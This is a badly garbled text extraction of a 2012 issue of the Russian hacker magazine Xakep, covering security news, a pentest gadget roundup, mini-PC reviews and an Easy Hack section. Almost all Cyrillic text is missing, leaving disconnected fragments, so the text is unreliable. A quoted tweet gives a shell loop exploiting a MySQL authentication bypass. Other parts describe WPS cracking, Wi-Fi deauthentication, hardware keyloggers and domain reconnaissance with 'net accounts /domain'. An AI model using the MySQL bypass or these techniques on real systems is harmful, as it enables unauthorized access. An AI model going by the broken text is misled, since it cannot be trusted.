Академический Документы
Профессиональный Документы
Культура Документы
WWW.XAKEP.RU
08 (163) 2012
-:
- 35 $
: 230 .
018
14 ,
054
059
114
PHP
LINUX MINT?
, 2012. .
, ,
. Kaspersky Internet Security.
www.kaspersky.ru
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
PC_ZONE UNITS
UNIXOID SYN/ACK
MALWARE
PR-
step (step@real.xakep.ru)
(goltsev@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
(vagizova@glc.ru)
DVD
Unix-
Security-
ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)
ART
-
(alik@glc.ru)
(bessonovart.ru)
PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906
-
, ,
(,
), , ,
. -
, - ,
- .. . ( )
- .
, , LinkedIn
Last.fm. SHA1 , MD5 (,
plaintext). , , GPU ,
.
7080 .
, -
!
, - . , ,
?
,
, , , .
. bcrypt PBKDF2 c .
.
gorl,
. .
P. S. 11 Intro .
, .
;).
.: (495) 935-7034, : (495) 545-0906
TECHNOLOGY
CORPORATE
-
(zinaidach@glc.ru)
(filatova@glc.ru)
(polikarpova@glc.ru)
(melnikova@glc.ru)
(kachurin@glc.ru)
( )
(tatarenkova@glc.ru)
(bulanova@glc.ru)
(korenfeld@glc.ru)
(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)
:
DVD-: claim@glc.ru.
: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002.
Scanweb, . 218 500 .
.
. ,
, . .
.
: content@glc.ru.
, , 2012
Content
012
HEADER
004
011
MEGANEWS
hacker tweets
-
016
017
,
NFC,
ANDROID.
.
Proof-of-concept
COVERSTORY
026
, ][
COVERSTORY
018
14
038
114
PCZONE
032
038
15
Windows-,
- -
Raspberry Pi, Cotton Candy, CuBox,
PandaBoard, Trim-Slice AllWinner A10
044
050
054
059
064
068
Easy-Hack
PHP
PHP
PHP
-
X-Tools
7
102
UNIXOID
108
114
120
124
128
078
138
140
090
096
098
Be quick or be dead
SATA 3.0
, , Z77 !
GIGABYTE G1.Sniper 3
084
NetFlow
FERRUM
132
, ?
, !
Flamer
Linux
3.0 3.4
Linux Mint 13 Maya
,
Ubuntu Linux 8-
SYN/ACK
MALWARE
070
Highload. 2
143
144
FAQ UNITED
FAQ
8,5
WWW2
web-
MEGANEWS
BIOS
40%,
.
Mebromi,
BIOS (Award BIOS), . CBROM
BIOS.
BIOS
(MBR) ,
winlogon.exe winnt.exe Windows XP 2000/2003
.
MBR
. ,
BIOS. Mebromi
!
Award BIOS, MBR.
McAfee ,
Niwa!mem.
, Mebromi, MBR
DLL, cbrom.
exe Award BIOS. :
, BIOS
.
:
Niwa!mem
,
Mebromi,
.
Angry Birds
,
.
004
PAYPAL .
XSS, CSRF, SQL
injection
.
.
35 000 , 76 000 (
rookee.ru).
MICROSOFT
HTC ,
ARM-
Windows 8.
.
23 100
Google.
Google.
08 /163/ 2012
MEGANEWS
HDD : 9,6 .
SIRI
SIRI
Kaspersky Lab
3,5
2,5 ,
.
IPAT
.
,
,
.
Siri,
iPhone
iPad. ,
Siri Apple, . . -,
Apple ,
.
-,
,
,
,
. ,
,
.
. ,
Apple , .
Apple ,
, Apple
Siri
.
, , ,
, (Prem Natarajan), -
Raytheon BBN Technologies (),
-
. , Apple
,
. ,
, Apple ,
CPU .
Apple ,
,
Siri, -, GPS , .
,
. (eugene.kaspersky.ru/2012/06/26/kill-the-troll),
, . : IPAT
. IPAT .
2008 34 , Symantec, Sophos, McAfee,
F-Secure, CA, Trend Micro, Novell, Eset, Microsoft .
,
. 5,311,591
5,412,717 90- , IPAT.
, ,
.
IPAT .
WITH PREJUDICE, IPAT
! . ,
:).
APPLE MAC OS X
MAC OS
,
MAC OS X
, DOESNT
GET PC VIRUSES
006
08 /163/ 2012
MEGANEWS
MCAFEE: 83% .
GOOGLE
,
Crypto-Gram , , Vupen, Netragard .
: Forbs
,
- ( ). Forbs,
, 250 .
, , ,
. 2010 .
, ,
,
.
. Microsoft, Google
,
.
. ,
, :
.
Guardian,
.
: ,
;
Facebook Apple, ;
.
, ,
, ,
Skype. Google
:
. , ,
/ , , SMS
, ,
, URL Google.
,
Google
( ).
,
MD5CRYPT -
,
.
LinkedIn, eHarmony
Last.fm.
( 50 )
-
,
, SHA.
008
FACEBOOK
,
,
The New York
Times.
DO
NOT TRACK,
: Microsoft ,
IE 10 DNT
.
08 /163/ 2012
MEGANEWS
Linux. , , ,
, ,
, -
. ,
,
() . ,
, .
, Windows 8 UEFI
:
, , ,
,
(
?)
, .
IPHONE
4S, 0-DAY
WINDOWS XP
FREEBSD
010
08 /163/ 2012
#hacker tweets
@mihi42:
. ,
Java 7 Update 5 6 Update 33
.
@cBekrar:
MS
500 000 ,
#BlueHatPrize anti-ROP,
,
.
@0xcharlie:
@andreybelenko:
,
: t.co/2SGIJ8oU.
,
ASLR iOS 6.
-
.
?
@sanjar_satsura:
... ,
,
Flame,
. ][
:
][! !
:)
@hdmoore:
: $ for i in `seq 1
512`; do echo 'select @@version;'
| mysql -h 127.0.0.1 -u root mysql
--password=X 2>/dev/null && break; done
:
, .
MySQL
memcmp(). MySQL. goo.gl/EtbCO.
Microsoft
BlueHatPrize. , 250 000 ,
.
: ,
DCIM
? DCIM :
Digital Camera IMages.
@esizkur:
,
PaX
: BlueHat
.
:
BlueHatPrize.
@crypt0ad:
@mikko:
, calc.exe,
,
.
@homakov:
@justinelze:
,
alert(test)
.
,
CSRF-
, PHP.
, CSRF- .
#php
@opexxx:
@taosecurity:
, ,
Microsoft , Huawei.
Reverse mirroring;
.
08 /163/ 2012
@DEVOPS_BORAT:
,
, .
: LinkedIn,
Last.fm ...
011
MEGANEWS
-
SMARTKEY TV
NFC
ANDROID- ,
LiquidTv. ,
SmartKey TV , -
Android 4.0 Ice Cream Sandwich, ,
HDMI-
. ,
Cortex A9 1
Mali-400 ARM, Full
HD 1080p, 512 , 4 -,
Wi-Fi, microSDHC miniUSB. SmartKey TV
DLNA ,
. Google Play
. Skype, , ,
, .
, .
. Android-.
SmartKey TV 99 120
QWERTY- .
VOLVO
.
200 .
012
GOOGLE ICANN
50 ,
.google, .youtube
.lol.
:).
55
, :
7,5
6,3 ,
.
ymantec Android,
, NFC. ,
NFC
.
. ,
. . , NFC,
Android.Ecardgrabber.
, ,
. .
NFC. Google Play 13 ,
100 500 .
.
,
: MasterCard
GeldKarte.
MOZILLA
Mozilla Marketplace, .
200
.
NOKIA
;
10 000
(20% ),
Vertu.
08 /163/ 2012
DROPBOX , .
IVY BRIDGE
IPV6
INTEL ULV-
Ivy Bridge
110
.
,
.
IPv6,
6 2012 , .
IPv4, 3,7 .
- 6 IPv6. ,
IP-
, . IPv4,
, ,
. IPv6 ,
-. Google, Yahoo Facebook
,
IPv6, IPv4.
IPv6 Google, Yahoo, Microsoft,
Facebook, Cisco, Akamai Limelight.
-
- - .
, IPv6
, Comcast AT&T ,
France Telecom , XS4ALL . , Cisco Linksys, D-Link ,
IPv6.
IPv6 . , ,
- ARIN, :
, IPv4 IPv6, -
, .
,
, ,
. , ,
, ,
, :).
FLAME
,
,
08 /163/ 2012
013
MEGANEWS
LINKEDIN
236 578
Polimo
,
.
Raspberry Pi
Raspberry Pi Foundation 2011 , .
, 2535 . ,
?
, , . -,
, Raspberry Pi
. -, ,
, Wi-Fi-
USB, Linux ?
PwnPi
(pwnpi.sourceforge.net) Raspberry Pi,
. ,
,
,
.
,
Raspberry Pi Parrot DF3120 25 . 3,5
Bluetooth. , , ,
.
014
(29%
) (10%),
Superjob.ru.
IPHONE IPAD
, ,
,
Bay.ru.
08 /163/ 2012
MICROSOFT
SURFACE
,
Microsoft
Surface
.
.
,
, . Microsoft
Windows- Surface,
.
Surface Windows
RT Windows 8 Pro ( ).
10- -,
- Touch Cover,
3 .
, ( SmartCover iPad). ,
, Apple.
Type Cover,
, , . , Type Cover
, .
.
,
Windows RT Windows 8 Pro, . , NVIDIA Tegra,
microSD, USB 2.0, Micro HD Video,
676 9,3 .
Intel Core i5 (Ivy Bridge),
microSDXC, USB 3.0, Mini DisplayPort 903 13,5 . -
10 , 6 .
VaporMg,
. , .
Gorilla Corning Glass.
,
3G/4G? , . ,
Wi-Fi .
,
, Windows RT ( NVIDIA Tegra 3)
499599 ,
Intel Ivy Bridge Windows 8 Pro - 999 . Microsoft , ARM-
( Surface Windows RT) (
Surface Windows 8 Pro), .
, ,
Surface Windows RT, - Microsoft. ,
OEM-
2013 Windows RT ,
. Surface, , .
.
-
USB-,
91 1,95 .
08 /163/ 2012
015
HEADER
Mockingbird
,
, .
-
. , ,
: .
,
, -
, :
, .
. ,
,
, .
, .
.
, , ,
.
. ,
dragndrop ,
, , .
.
:
?
,
,
016
( ?!),
.
, ,
Windows 7 Mac OS X. ,
.
, ,
. , : iOS
Android. proto.io, .
,
. ,
iPhone
,
.
.
. ,
usability, , .
, ,
, . z
08 /163/ 2012
(alizar@gmail.com)
Proof-of-Concept
HTTP , .
,
.
, .
, Wi-Fi-- ( Firesheep DroidSheep).
- , .
HTTPS, . ,
:
- , XSS, XST , HTTPS
.
, , .
: ,
? One Time
Cookies, OTC (www.cc.gatech.edu/~idacosta/otc/index.html). , OTC
.
, HTTPS-, HMAC (Hash-based Message
Authentication Code) ,
, . OTC. ,
( )
,
.
, HMAC
. , ,
HMAC.
,
, ( ).
OTC
, , . , , .
OTC
HTTPS.
uid, pwd:
ks, ns: ,
kw: -
ts, th:
url:
data: POST
v: OTC
OTC
08 /163/ 2012
OTC, ,
. WordPress (www.
cc.gatech.edu/~idacosta/otc/otc_wp_plugin.zip),
Firefox (www.cc.gatech.edu/~idacosta/otc/
otc.xpi).
, ,
,
Wireshark Live HTTP Headers Firefox. z
017
COVERSTORY
14
, ,
,
.
(The Art of Intrusion)
,
. ,
.
( ).
Wi-Fi. ,
, - .
,
.
018
007.
. ? .
08 /163/ 2012
,
, - , , ,
: ?
, - , ( ,
) MITM-,
, .
Wi-Fi Guest .
- (Rogue AP) .
, .
WiFi Pineapple, 2008 ,
.
.
, (
Atheros AR9331 SoC 400 ), ,
OpenWRT , , Karma, DNS Spoof, SSL Strip, URL Snarf,
ngrep . , ,
( -)
.
,
(
Battery Pack), - , .
99,99
Ubertooth One
ubertooth.sourceforge.net
119,99
Wi-Fi,
, Bluetooth .
, ShmooCon 2011 ( youtu.be/KSd_1FE6z4Y),
Ubertooth (ubertooth.sourceforge.net).
. BT-
, 10 000 .
, ,
. , USB-
, ARM
Cortex-M3. ,
promiscuous,
Bluetooth-,
. , ,
, , . Ubertooth One Bluetooth-,
Kismet (kismetwireless.net).
, ,
.
08 /163/ 2012
019
COVERSTORY
,
, ,
Wi-Fi-,
. , , , , :). ,
.
, ,
.
ALFA USB WiFi AWUS036NHA. Wi-Fi USB-
Alfa AWUS036NHA,
Atheros AR9271 b/g/n ( 150 /).
, -
BackTrack 5, . , USB-
, ( Backtrack),
USB-.
Pineapple Mark IV.
2.2.0 Pineapple
deauth-. : ,
. WPA handshake,
WPA-.
99,99
020
35,99
Reaver Pro
bit.ly/IRrZfF
,
WPA- .
,
WPS.
][_03_2012,
Reaver (code.google.com/p/reaver-wps). , .
. WPS pin,
, WPA-. , , . Reaver
4 10 WPS pin. , ,
, ,
. WPA-,
( handshake),
WPS .
:
, .
Reaver Pro
WiFi Pineapple Mark IV ( ). ,
Reaver Pro, , .
08 /163/ 2012
. .
-
.
. ( omni), .
16dBi Yagi Antenna.
RP-SMA
.
iFi Pineapple,
ALFA AWUS036H, WiFi
. ,
Ubertooth One, Wi-Fi-.
.
,
,
(, ).
30
69,99
08 /163/ 2012
USB, Teensy.
, HID- () , , , ,
(, ).
USB Rubber Ducky Teensy. 60 32- AVR- AT32UC3B1256,
- . Duckyscript ( bat-),
. , Wi-Fi-, reverse ,
. microSD-,
.
, ,
, .
, , , .
021
COVERSTORY
7
8
Throwing Star LAN Tap
bit.ly/LYOW2f
- , : , ,
.
.
, ,
, .
? Throwing Star LAN Tap
, Ethernet-. ,
( ), .
Throwing Star LAN Tap.
J1 J2, J3 J4
. , J3 J4
, , , ( ). Throwing
Star LAN Tap 10BaseT
100BaseTX
. , 1000BaseT.
,
( 100BaseTX),
. ,
( Open Source hardware).
14,99
100
GSM/GPS/Wi-Fi-
www.google.com
,
, jammer , -,
. - , .
, , ,
.
(GSM),
, , , GPS-,
. ,
, .
( )
, , , .
,
-.
,
.
, ( !), ,
,
.
022
08 /163/ 2012
,
.
Mifare Classic 1K.
, () , , .
0,5, 1 4 , 16 .
( ). Mifare 10 ,
100 000. ,
. ,
, .
,
, .
: , , :).
bit.ly/MQlw6e,
65 . ,
,
. , ,
, Mifare Ultralight. ,
, NFC, ZigBee .
NFC, , RFID,
.
10
149,99
08 /163/ 2012
65
KeyGrabber
www.keelog.com
- ,
.
:
. ,
,
KeyGrabber, PS/2,
USB-. ,
.
, , . ,
,
Wi-Fi-,
e-mail.
. , , KeyGrabber
Module ,
PS/2- USB-.
VideoGhost , , (2 ).
DVI-, HDMI-, VGA-,
149,99 .
023
COVERSTORY
MiniPwner
www.minipwner.com
11
,
,
. MiniPwner ,
/
.
,
- .
.
SSH- . ,
TP-Link TL-WR703N,
4 ,
802.11n Ethernet-. OpenWrt,
,
: Nmap, Tcpdump,
Netcat, aircrack kismet, perl, openvpn, dsniff, nbtscan, snort,
samba2-client, elinks, yafc, openssh-sftp-client .
, , 1700 ,
,
. ,
, , .
99
Pwn Plug
pwnieexpress.com
12
595
024
08 /163/ 2012
AR.Drone
ardrone.parrot.com
.
, ,
... ! -.
,
. , AR.Drone ,
.
: .
AR.Drone ,
, , , , , .
:
,
. :
iPhone, iPad Android, . ,
. ,
, . ,
: bit.ly/GVCflk
, ; bit.ly/o8pLgk ,
; bit.ly/fhWsjo
, , .
14
08 /163/ 2012
299
13
Raspberry Pi
25
raspberrypi.org
Raspberry Pi,
. , Raspberry Pi
Foundation. ARM 11
700 M
.
, ,
. /, USB 2.0,
SD/MMC/SDIO, Ethernet-,
HDMI-. ,
drop-box. ,
, ,
Wi-Fi- USB Linux . Linux- Debian, Fedora, Ubuntu,
PwnPi (pwnpi.sourceforge.net),
Raspberry Pi.
.
I2P, Metasploit,
.
025
COVERSTORY
][
: ,
, ,
. ,
, ,
.
, ,
,
.
026
, ,
Endeavor Security. 800 . ,
: endeavorsecurity.blogspot.com.
, .
, ,
, ,
. . ,
, .
.
, . , , c
XSS. , , . -
!
. , , , , .
-.
08 /163/ 2012
, , .
,
,
13
,
.
2010 .
08 /163/ 2012
027
COVERSTORY
2008 ,
, ,
. Macrovision
- ,
.
Endeavor Security.
:
,
.
,
, ,
.
: , ,
? - .
,
: , - ,
,
.
. ,
! ,
.
, -, . ,
, , .
,
. ,
C
C++ .
void,
. : ,
? , , ,
. ,
.
:
? ,
C define.
,
. ( C89)
,
, .
, ,
, , , , ,
. ,
15
!
crack me
,
. : .
, .
crack me ,
,
, .
?
, ,
?
028
,
, .
,
300 000 , :
.
-
- 150200 , 300 . .
Endeavor Security,
- .
.
, ,
, ,
. : 300
, .
, , 3000 ,
300 ?! :) ,
, 170 .
Endeavor,
. ,
Endeavor McAfee,
.
, :
300 Cryptograph Research
-
170 . , ,
.
,
, , . ,
,
.
.
,
.
:
,
. !
? !
,
, . , -
. Endeavor
,
, . ,
, :). ,
.
-! ,
.
Panda Security , . -,
,
, revenue 5%. ,
IT-.
( 75
) ,
. .
, c Codegate 2009.
Soft Forum
, -
08 /163/ 2012
.
, - : HR-,
,
, ,
- .
, .
: ,
, . , -
.
, .
,
. : L-1
( ) O-1
.
. L-1,
McAfee,
. O-1 :
, . :
, .
,
, . , ,
.
, ,
,
.
,
, , .
, , ,
. : ,
,
. ,
,
L-1.
. -,
, , , ,
. ,
,
.
, ,
.
, ,
. ? ,
, .
-,
-, ,
, , , ,
. ,
.
08 /163/ 2012
,
: British
Airways, , . .
,
. . ,
:).
-
.
, -
. ? :
. .
: ,
,
.
, -,
!
.
IAD. ,
,
,
, ,
.
McAfee
. (
) ,
. -
-,
,
.
:
, ,
.
.
:
,
. !
Senior Malware Researcher. ,
.
,
. .
: NOT CITIZEN.
, ,
. .
,
. .
, . ,
.
, ,
.
. !
2009
McAfee!
Operation Aurora. ,
.
- , 40 000 ,
. ,
.
.
, -,
.
, . ,
. ,
.
, ,
? , .
, Linux vim
! , ,
. ,
, , ,
.
,
.
, . , , , ,
,
.
.
, :
, , , , , ,
, .
, QNX . .
, .
,
.
2009
MCAFEE!
OPERATION AURORA.
,
029
COVERSTORY
.
, , ,
, .
,
.
.
.
, ,
, ,
.
, . .
,
.
,
. ,
- .
: 100 ,
, 10 000 ,
,
.
, , , .
: , ,
,
.
,
. , , ,
.
.
? ,
. !
, .
,
- , .
! , ,
. ,
.
, .
:
, .
, . !
.
,
. :
,
. .
? !
, .
- , ,
030
,
, .
- ,
, - .
: ,
, ,
,
.
: ,
.
,
, K?.
.
:
. .
, .
, Endeavor
Security,
.
,
, .
-, , . ,
,
.
. Intel, Oracle, Microsoft, Google,
Symantec . -
.
Endeavour Security
. ,
. , , .
- -
. . ,
.
.
,
-. ,
, .
,
.
,
, ,
. ,
. ,
,
.
, . ,
- . ,
, . ,
.
,
, .
,
15
- --
,
.
.
,
.
: ,
.
.
, !
, !
. -,
. . ,
SSN
- - . SSN
. , ,
. ,
.
. ,
,
SSN. ,
.
.
, .
,
. ,
SSN!
-. !
,
, , .
? .
, . !
,
. ,
, .
.
.
, ,
,
.
. z
08 /163/ 2012
Preview
37 .
.
PC ZONE
38
- -
35 ? , 2012 , !
-
,
.
Raspberry Pi ,
.
. :
,
USB-,
:
. , .
PC ZONE
32
15
Windows-,
.
.
64
, PHP
.
08 /163/ 2012
54
,
.
.
59
PHP
PHP.
.
MALWARE
70
,
. .
78
, !
Flamer
.
031
PC ZONE
urban.prankster (martin@synack.ru)
15
WINDOWS-,
,
,
,
.
,
,
.
032
08 /163/ 2012
ADVANCED IP SCANNER
, , .
Advanced IP Scanner (radmin.ru/products/ipscanner),
. AIPS , . .
AIPS IP- ,
,
IP ; IP ,
.
.
: MAC-,
, , ,
( , HTTP, HTTPS
FTP). ,
( , HTTP, HTTPS FTP).
,
. AIPS
Radmin Radmin Server. (XML, HTML CSV)
( drag-and-drop). , ,
.
Wake-on-LAN, ,
.
(, , ) ;
; ; ;
; /; ;
(uptime, , ).
. ,
,
(avi, mp3 ).
-,
(txt, XML, CSV, PDF)
( , :
MS SQL, MS Access, MySQL, Oracle ), e-mail
.
CHECKCFG
. ,
CheckCfg
(checkcfg.narod.ru).
, , CPU, ,
, S.M.A.R.T. . CheckCfg
. ,
.
, RTF.
CheckCfg .
CheckCfg,
.
Sklad, ,
CheckCfg, , . Sklad_w
( IP-, CPU, Memory,
).
Doberman.
, ,
,
.
WINAUDIT FREEWARE
WinAudit Parmavex Services
(pxserver.com/WinAudit.htm),
. ,
. ,
Windows, 64-.
( ), 30 (
). ,
,
;
08 /163/ 2012
Advanced IP Scanner ,
033
PC ZONE
WinAudit ,
MailArchiva
(mailarchiva.com), (Lotus Domino, MS Exchange, MDaemon, Postfix, Zimbra,
Sendmail, Scalix, Google Apps).
SMTP, IMAP/POP3, WebDAV ilter (
SMTP- Milter-, IMAP/POP-).
, .
( ), (
) ( , ). Open
Source MailArchiva (openmailarchiva.sf.net) ,
(Word, PowerPoint, Excel, OpenOffice, PDF, RTF, ZIP, tar, gz).
MailArchiva Windows, Linux, FreeBSD Mac OS X.
034
, PAL,
VIRTUAL ROUTER
, Wi-Fi- , . ,
WLAN Wi-Fi.
: , , . Win7/2k8 ( Win7
Starter Edition)
( Virtual Wi-Fi), Wi-Fi-
Wi-Fi-.
Wi-Fi (SAPoint, Software Access Point).
- WPA2.
Win7/2k8R2
Netsh,
,
Virtual Router (virtualrouter.codeplex.com), GUI .
Virtual Router SSD
, . -
. ,
.
RDC- RDCMAN
,
Windows, Remote
Desktop Connection.
RDP- ,
.
Remote Desktop Connection
Manager (RDCMan, goo.gl/QHNfQ), .
RDP-,
. , ,
, .
(, , , ),
08 /163/ 2012
. .
,
, .
. ,
, , . , ,
Connect.
.
AMANDA
, Windows
*nix, AMANDA (Advanced Maryland
Automatic Network Disk Archiver, amanda.org). ,
(vtapes),
CD/DVD. AMANDA
unix- dump/restore, GNU
tar , -
, NetWrix Inactive
Users Tracker
08 /163/ 2012
,
POWERSHELL
,
035
PC ZONE
. - . :
Kerberos 4/5, OpenSSH, rsh, bsdtcp, bsdudp Samba.
Windows-
, , Samba. (GPG amcrypt)
,
.
,
, .
036
Virtual Router,
C# PowerShell.
Exchange 2010 Management Tools.
POWERGUI
, PowerShell , ,
.
PowerShell Microsoft , .
PowerGUI (powergui.org), PowerShell-.
.
MULTI-TABBED PUTTY
PuTTY
,
SSH, Telnet rlogin. ,
.
.
Multi-Tabbed PuTTY (ttyplus.com/multi-tabbed-putty),
.
: ,
, . z
WWW
INFO
codeplex.com
.
Virtual Router
onnectify
(connectify.me),
Lite-
,
.
mhotspot
(mhotspot.com).
Amanda
Server
Windows: goo.gl/zyNzd.
Comodo Time Machine
EaseUS Todo Backup
Free (goo.gl/uifWC).
PuTTY
Windows,
Unix.
08 /163/ 2012
PC ZONE
(dhsilabs@mail.ru)
,
.
USB-.
038
RASPBERRY PI,
COTTON CANDY, CUBOX,
PANDABOARD, TRIM-SLICE
ALLWINNER A10
-
?
.
, -.
? :) , 1960-
DEC PDP-1, , .
- .
- , USB-.
, ( ,
?)
,
,
.
, , , -
. ,
- ARM-,
, . -
Android, (
,
) Linux. ,
Linux , .
HD-. HDMI-
.
DVI-, ( HDMI-).
, /
HDMI-. . :
( ),
HDMI-, . ,
, ,
.
-.
. USB, , USB-.
USB-
USB-: ,
, .
: USB-:
, .
, ,
Wi-Fi, Ethernet.
08 /163/ 2012
- -
RASPBERRY PI
RASPBERRY PI
Raspberry Pi . ,
,
. , Hexxeh,
. ,
,
.
, rpi-update
:
wget http://goo.gl/1BOfJ -O /usr/bin/
rpi-update && chmod +x /usr/bin/rpi-update
sudo apt-get install ca-certificates
rpi-update root:
sudo rpi-update
-
.
Raspberry Pi, ,
USB-
2011 .
-
, 12
.
, -
, , ,
.
, ,
?
20% ,
, .
, :
, .
Raspberry
Pi B. Broadcom
BCM2835 ( ARM11)
700
256 , ( package-on-package).
BCM2835 OpenGL ES 2.0,
FullHD-.
.
USB- (
, B )
08 /163/ 2012
Ethernet- B.
RCA
HDMI.
SD, MMC SDIO.
SD-.
,
, , . ,
, .
? : -
Debian
Fedora. Linux . ,
Raspberry Pi, 19
,
Debian 6.0, LXDE,
Midori. , -
,
ARM.
,
https://github.
com/Hexxeh/rpi-firmware. rpiupdate :
FW_REPO="git://github.com/Hexxeh/
rpi-firmware.git"
. github.com/Hexxeh/
rpi-firmware.git,
https://github.
com/Hexxeh/rpi-firmware, .
.
SKIP_KERNEL .
SKIP_KERNEL=1,
Raspberry Pi , .
ROOT_PATH/BOOT_PATH -,
SD-.
:
SKIP_KERNEL=1 rpi-update
ROOT_PATH=/media/root BOOT_PATH=/media/
boot rpi-update
35$
farnell.com/raspberrypi
039
PC ZONE
CUBOX
99$
solid-run.com/store
FXI
COTTON
CANDY
199$
store.cstick.com
- . Raspberry Pi
, FXI .
( ),
- CuBox. CuBox
(222 ) 91 .
, , ,
ARM- Marvell Armada 510 ARMv7 800 . 1 , Vivante GC600 GPU, OpenGL 3.0 and OpenGL ES 2.0 2D/3D-.
HD- (Marvell vMeta HD Video Decoder).
, ,
1080p KDE
GNOME Linux. 3 !
Ubuntu
Desktop 10.04 ( Linux
2.6.x) Android 2.2.x ( ).
SD-,
. SD-, ,
2 , ,
Ubuntu Android ( ).
FXI Cotton Candy ( FXI Technologies)
HDMI.
Cotton Candy Samsung Exynos
4210 1,2 (
ARM), 1
Mali-400 MP.
microSD (
64 ).
B
Ethernet-, Cotton Candy
Wi-Fi 802.11b/g/n
Bluetooth 2.1.
. ,
.
040
DBUS.
HDMI,
,
NetworkManager asoc: CS42L51
<-> mv88fx-i2s1 No matching rates.
CuBox , .
DBUS:
sudo apt-get --reinstall install dbus
08 /163/ 2012
- -
PANDABOARD
UBUNTU PANDABOARD
, PandaBoard Linux
Android. , , Ubuntu.
. PandaBoard OMAP4,
Linux, OMAP4. , Ubuntu.
Linux (
), SD-.
Ubuntu OMAP4: cdimage.ubuntu.com/releases/11.10/release/
ubuntu-11.10-preinstalled-desktop-armel+omap4.img.gz.
SD-. SD-,
:
$ df -h
PandaBoard ,
.
Texas Instruments (). ,
, ,
. PandaBoard
,
. ,
PandaBoard -,
.
PandaBoard TI OMAP
4460 ( PandaBoard ES, PandaBoard 4430) ARM Cortex-A9.
1,2 , 1 ,
SD-.
PowerVR SGX540. OpenGL ES 2.0,
OpenGL ES 1.1, OpenVG 1.1 EGL 1.3.
? , ,
WiLinkTM 6.0,
Wi-Fi (802.11 b/g/n) Bluetooth,
Ethernet 10/100, RTC ( ), HDMI DVI-D, USB 2.0,
. 82
, 114,3101,6 .
RS-232 ( ,
,
- , )
. , BeadaFrame
7" LCD (BeadaFrame 7" LCD display kit),
TFT- 7 800480, ,
(RTC
time keeper) .
- ,
Linux Android.
182$
goo.gl/8fWYF
- :
Filesystem
/dev/sda5
none
none
none
none
/dev/sdb2
Size
100G
995M
1002M
1002M
1002M
16G
Used
8.0G
700K
308K
104K
0
0G
Avail
Use% Mounted on
92G
8% /
995M
1% /dev
1001M
1% /dev/shm
1002M
1% /var/run
1002M
0% /var/lock
16G
0% /media/ 097afede571b-32c4-8612-3364f0655f52
, SD- /dev/sdb2. :
$ sudo umount /dev/sdb2
SD-:
$ gunzip -c ubuntu-11.10-preinstalled-server-armel+omap4.img.gz \
| sudo dd bs=4M of=/dev/sdb
$ sync
PandaBoard COM-
. , USB2COM (USB
to Serial). PandaBoard ( ):
$ TERM=vt100 minicom -s
minicom /dev/ttyUSB0,
USB2COM. ,
PandaBoard, $ dmesg | grep tty.
,
, Ubuntu .
Ubuntu .
PandaBoard /etc/apt/sources.list
sudo vim /etc/apt/sources.list
,
Universe Multiverse. :
$
$
$
$
sudo
sudo
sudo
sudo
PandaBoard:
$ sudo reboot
08 /163/ 2012
041
PC ZONE
TRIM-SLICE
Trim-Slice
,
CompuLab. -.
Trim-Slice
. (9,5131,5 ),
, .
NVIDIA Tegra 2. ARM-
1 1,2 .
Trim-Slice : SSD SATA 32 (-,
SSD-), SD- SD- , 1 DDR2-800,
HDMI DVI, 5.1, 4 USB- 2.0,
Ethernet- 10/100/1000, Wi-Fi 80.211n, RS-232.
,
( USB-, RS-232, Wi-Fi Ethernet), ( SSD SD- ),
. USB-.
, Trim-Slice , .
Ubuntu.
ALLWINNER A10
ZERO DEVICES Z802
74$
, .
- .
-
AlLWinner A10 ZERO Devices Z802
, ,
.
ZERO Devices.
2
. .
ZERO Devices Z802: tinyurl.com/7gjzj6y.
338$
trimslice.com
- ARM,
, . - ANDROID
LINUX.
042
08 /163/ 2012
- -
Raspberry Pi
Cotton Candy
CuBox
PandaBoard
Trim-Slice
AllWinner A10
Raspberry Pi
Foundation,
FXI Technologies,
SolidRun Ltd.,
Texas Instruments,
CompuLab,
AllWinner Technology
Co. Ltd.,
35 $
199 $
99
182 $
213338 $
74 $
Debian, Ubuntu,
Fedora
Ubuntu,
Android
, Linux, Android,
QNZ, RiscOS
Ubuntu
Broadcom
BCM2835, 700
256
1 DRAM
1 DDR3 800
1 DDR2
1 DDR2-800
512 DDR2
Mali-400 MP
PowerVR SGX540
Mali-400
USB 2.0 x 2*
HDMI x 1
RCA x 1
USB 2.0 x 1
microUSB x 1
HDMI x 1
HDMI x 1
S/PDIF x 1
USB 2.0 x 1
eSATA x 1
irDA x 1
microUSB x 1
HDMI x 1
DVI x 1
Audio In/Out
USB x 3
RS 232
HDMI x 1
DVI x 1
USB 2.0 x 4
S/PDIF 5.1 x 1
Stereo line-out / line-in
HDMI x 1
USB 2.0 x 1
microUSB x 1
SATA x 1
SD, MMC SD
microSD
microSD, eSATA
SD, MMC SD
Micro TF 2-32GB
1000baseT Ethernet
Bluetooth
Wi-Fi 80.211n
RS-232
100baseT Ethernet
Wi-Fi 802.11 b/g
26
2,757,8
Ethernet
Wi-Fi 802.11b/g/n
Bluetooth
1000baseT Ethernet
* 2 B, A
08 /163/ 2012
043
/ EASY HACK
EASY
HACK
INFO
.
SSL
SSL ,
.
, . ,
.
.
Easy Hack, ,
SSL ( HTTPS), .
, SSL - ,
, . SSL
2.0. ,
man-in-the-middle.
/ ( , ).
, ,
.
- SSL v2.0. , , BEAST-. ,
RC4.
, :).
,
MITM-,
. SSL, , (),
- .
. -,
,
. -,
,
.
:).
, - , , .
, , . , Java
044
SSL, . ,
, . !
FTPS, POP3S. , ,
, - ,
SSL Chrome
08 /163/ 2012
.
.
.
?.
, . Gremwell (www.gremwell.com)
sslcaudit (goo.gl/6vwuC),
SSL-.
,
.
, , . .
:
git clone -b release_1_0 https://github.com/grwl/sslcaudit.git
sudo apt-get install python-m2crypto
- ,
HTTPS, https://ssltest.
offenseindepth.com. .
( sslcaudit), SSL-
Wireshark. ,
ncat, ,
SSL.
./sslcaudit
ncat -l -p 4343 --ssl
8443.
, . goo.gl/EKSWl.
SSL v2.0.
, - .
, .
, , - ,
: - , . , , .
,
. ,
.
,
, . , , ,
-
. : _.
,
. ,
,
.
, , SMB- PDF.
.
, NULL session, Cain, , SID (. ),
.
, . .
: ,
. , (, ):
net accounts /domain
, , .
08 /163/ 2012
.
, , - :).
. -
.
